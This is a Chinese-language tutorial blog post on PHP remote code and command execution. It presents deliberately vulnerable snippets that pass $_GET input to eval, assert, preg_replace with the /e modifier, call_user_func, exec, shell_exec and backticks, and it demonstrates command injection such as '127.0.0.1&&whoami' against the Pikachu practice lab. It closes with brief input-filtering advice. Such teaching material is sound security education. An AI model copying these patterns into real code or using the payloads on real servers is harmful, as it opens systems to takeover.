WEB应用(十三)---RCE

什么是RCE?

Remote Command/Code Execute,远程命令或代码执行。通过构造特殊的字符串,将数据提交至Web应用程序,并利用该方式执行外部程序或系统命令实施攻击,类似于SQL注入。
Web应用程序使用了一些可以执行系统命令或代码的函数,而且对用户提交的数据过滤不严格,导致黑客可以利用服务器执行命令或代码。

php相关函数:

  1. eval(string $code);
  2. assert()函数
  3. preg_replace()函数
  4. call_user_func()函数
  5. exec()/shell_exec()函数
  6. 反撇号,作为命令来执行

当然不是只有以上的方式才是实现rce,这几个是最典型的函数,还有其他的函数就又大家以后去收集了

下面我们来看看远程代码执行

eval()函数 **,**我们在www目录下创建一个名为rce的文件夹,并且创建rce.php文件,写入以下代码

php 复制代码
<?php
//防止中文乱码
header("content-type:text/html;charset=utf8");
eval($_GET["code"]);
?>

去访问这个文件,然后传入参数,?code=echo 8-2;可以看到页面回显了6。

如果是一个恶意代码呢,?code=phpinfo(); 回显了php等其他相关信息

assert()函数,assert函数的本意并不是要执行代码,而是程序员用来调试代码用的。但是,如果第一个参数是字符串,它将会被 assert() 当做 PHP 代码来执行。先来看代码

php 复制代码
<?php
//防止中文乱码
header("content-type:text/html;charset=utf8");
//eval($_GET["code"]);
assert($_GET['code']);
?>

**preg_replace函数,**preg_replace ( mixed $pattern , mixed $replacement , mixed $subject)

搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。如果所替换内容为可执行函数,则该函数会被执行。

e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码。

php 复制代码
<?php
//防止中文乱码
header("content-type:text/html;charset=utf8");
//eval($_GET["code"]);
//assert($_GET['code']);
//这里可以将phpinfo,替换成$_GET['code']
preg_replace("/www/e","phpinfo()","www.com");
?>

**call_user_func()函数,**这个函数输入的不是函数,而是函数名,?code=phpinfo

php 复制代码
<?php
//防止中文乱码
header("content-type:text/html;charset=utf8");
//eval($_GET["code"]);
//assert($_GET['code']);
//preg_replace("/www/e","phpinfo()","www.com");
call_user_func($_GET['code']);
?>

下面是远程命令执行

exec()、shell_exec()函数

这里就可以输入ipconfig,whoami,在我们输入ipconfig时,我们发现只有一行的回显,这是因为返回时有多行信息,所以就返回最后一行,所以我们就可以换一个函数

php 复制代码
<?php
echo exec($_GET['cmd']);
?>

这个时候再传入ipconfig,信息就完整了

php 复制代码
<?php
//echo exec($_GET['cmd']);
echo shell_exec($_GET['cmd']);
?>

反撇号

这个键在Esc键的下方,Tab键的上方,被反撇号包起来的的内容会被当做命令去执行,但是内部不允许使用单引号,双引号等,所以直接上代码

php 复制代码
<?php
//echo exec($_GET['cmd']);
//echo shell_exec($_GET['cmd']);
$cmd = $_GET['cmd'];
echo `$cmd`;
?>

接下来看看命令连接符

下面几个命令作为练习,和验证

php 复制代码
<?php
//echo exec($_GET['cmd']);
//echo shell_exec($_GET['cmd']);
//$cmd = $_GET['cmd'];
//echo `$cmd`;
//pwd是linux下的命令在windows中不会有任何操作
echo `whoami&&ipconfig`;
echo `pwd&&ipconfig`;
?>

趁热打铁,我们来到pikachu靶场,进入第一个环境

这里提示要我们输入一个ip地址进去,我这里输入127.0.0.1,可以看到正确执行了,这些乱码其实是pikachu内置的编码和浏览器不一致导致的

当然输入一个域名也是可以的,这里我输入的百度的

接下来就可以练习命令连接符,这里去ping127.0.0.1一定可以执行,通过&&的连接后面的命令一定可以执行,如果你的靶场搭建在linux操作系统中相应的命令要发生变换

php 复制代码
//比如输入
127.0.0.1&&whoami
127.0.0.1&&ipconfig

接下来看看evel,最简单的输入phpinfo(); ,或者echo 10-2; 。

rce漏洞该怎么防御呢,对用户输入的符号做替换,进行严格的过滤,还可以进行输入内容的特征来详细的过滤,比如第一个ping,在这个环境中他只想让我们输入Ip地址,那我们就可以根据Ip地址的特点,点分十进制,首先将输入的内容以点号来分割,校验这四个部分是不是都是数字,只要有一个部分不是数字,那便返回错误。

相关推荐
mingzhi618 小时前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展
安胜ANSCEN10 小时前
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
网络·安全·web安全·威胁检测·自动化响应
超栈13 小时前
蓝桥杯-网络安全比赛题目-遗漏的压缩包
前端·网络·sql·安全·web安全·职场和发展·蓝桥杯
黑龙江亿林等级保护测评14 小时前
DDOS防护介绍
网络·人工智能·安全·web安全·智能路由器·ddos
kali-Myon15 小时前
NewStarCTF2024-Week5-Web&Misc-WP
前端·python·学习·mysql·web安全·php·web
知孤云出岫17 小时前
网络安全渗透实际案例
安全·web安全
文人sec20 小时前
泷羽sec学习打卡-shodan扫描4
网络·学习·安全·web安全
Wh1teR0se1 天前
ctfshow(162)--文件上传漏洞--远程文件包含
web安全·网络安全